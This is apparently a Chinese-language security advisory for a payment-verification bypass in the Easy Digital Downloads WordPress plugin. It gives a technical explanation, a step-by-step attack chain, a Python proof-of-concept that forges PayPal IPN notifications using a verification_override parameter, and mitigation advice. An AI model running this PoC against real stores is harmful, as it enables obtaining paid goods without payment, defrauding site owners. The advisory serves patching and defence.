CVE-2025-11271 WordPress Easy Digital Downloads插件订单验证绕过漏洞

漏洞信息

漏洞编号

CVE-2025-11271

漏洞类型

验证绕过

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Easy Digital Downloads (WordPress插件)

漏洞概述

CVE-2025-11271是WordPress平台下知名电商插件Easy Digital Downloads中的一个严重安全漏洞。该插件被广泛应用于WordPress网站，用于销售数字产品。漏洞存在于PayPal支付网关的IPN（Instant Payment Notification）验证逻辑中，攻击者可以通过在POST请求中注入特定的参数来绕过订单验证机制。具体而言，当请求中包含verification_override=1参数时，系统会无条件跳过支付验证流程，这意味着攻击者可以伪造支付通知，使系统误认为支付已完成，从而获取未付费的数字产品或服务。此漏洞影响该插件3.5.2及之前的所有版本，由于Easy Digital Downloads拥有数十万活跃安装量，此漏洞可能影响大量依赖该插件进行数字产品销售的网站。攻击者需要拥有有效的PayPal交易ID才能利用此漏洞，且只能操纵自己账户下的订单，但这仍然为恶意用户提供了免费获取付费内容的机会，给网站所有者造成直接经济损失。此外，该漏洞还可能被用于测试支付系统的完整性，为更复杂的攻击奠定基础。

技术细节

漏洞根源在于Easy Digital Downloads插件的PayPal IPN处理模块存在逻辑缺陷。在文件includes/gateways/paypal/ipn.php或src/Gateways/PayPal/IPN.php中，验证函数会对PayPal发送的IPN通知进行签名验证，以确保支付通知的真实性和完整性。然而，代码中存在一个致命的缺陷：验证逻辑被一个可由用户控制的参数verification_override所控制。当攻击者在POST请求中设置verification_override=1时，验证检查被完全跳过，导致系统无条件信任该支付通知。这意味着即使在生产环境中启用了验证机制，攻击者仍然可以通过构造恶意请求来绕过安全检查。攻击者需要拥有一个有效的PayPal商家账户以获取真实的交易ID，但通过操纵自己账户的订单，攻击者可以发起攻击：首先创建一个正常订单并完成支付获取有效的PayPal交易ID，然后使用该交易ID配合verification_override=1参数伪造IPN通知，欺骗系统认为订单已支付，从而获取数字产品。由于验证被绕过，系统无法识别这是伪造的支付通知，从而错误地将订单标记为已完成并交付产品。

攻击链分析

STEP 1

步骤1

攻击者在目标网站注册账户并选购数字产品

STEP 2

步骤2

攻击者使用自己的PayPal账户完成真实支付，获取有效的交易ID

STEP 3

步骤3

攻击者构造恶意IPN请求，在POST数据中添加verification_override=1参数

STEP 4

步骤4

系统接收到伪造的IPN通知，由于verification_override=1，跳过PayPal签名验证

STEP 5

步骤5

系统错误地将订单标记为已完成，并向攻击者交付数字产品

STEP 6

步骤6

攻击者获得未付费的数字产品，造成网站所有者经济损失

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests import json # CVE-2025-11271 PoC - Order Verification Bypass # Target: WordPress site with Easy Digital Downloads plugin # Affected versions: <= 3.5.2 target_url = "https://target-site.com/" # Replace with target URL paypal_ipn_endpoint = target_url + "?edd-listener=paypal" # IPN endpoint # Valid PayPal transaction ID obtained by attacker valid_txn_id = "YOUR_VALID_PAYPAL_TXN_ID" # Replace with real transaction ID # Construct malicious IPN request with verification bypass payload = { "txn_id": valid_txn_id, "mc_gross": "9.99", "currency_code": "USD", "payment_status": "Completed", "payer_email": "[email protected]", "item_number": "product_123", # Bypass verification - this is the key parameter "verification_override": "1" } try: response = requests.post(paypal_ipn_endpoint, data=payload, timeout=10) print(f"Response Status: {response.status_code}") print(f"Response Body: {response.text}") print("\n[!] If order manipulation succeeded, the system will treat") print(" this forged IPN as verified and complete the order.") except requests.exceptions.RequestException as e: print(f"Error: {e}")

影响范围

Easy Digital Downloads < 3.5.3

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时措施：1) 在Web应用防火墙（WAF）中添加规则，拦截包含verification_override参数的请求；2) 临时切换到其他支付网关如Stripe；3) 手动审查所有订单记录，识别未付款但标记为完成的订单；4) 限制数字产品的立即交付，改为人工审核后发货；5) 启用额外的订单异常检测机制，如IP地址校验、订单金额验证等。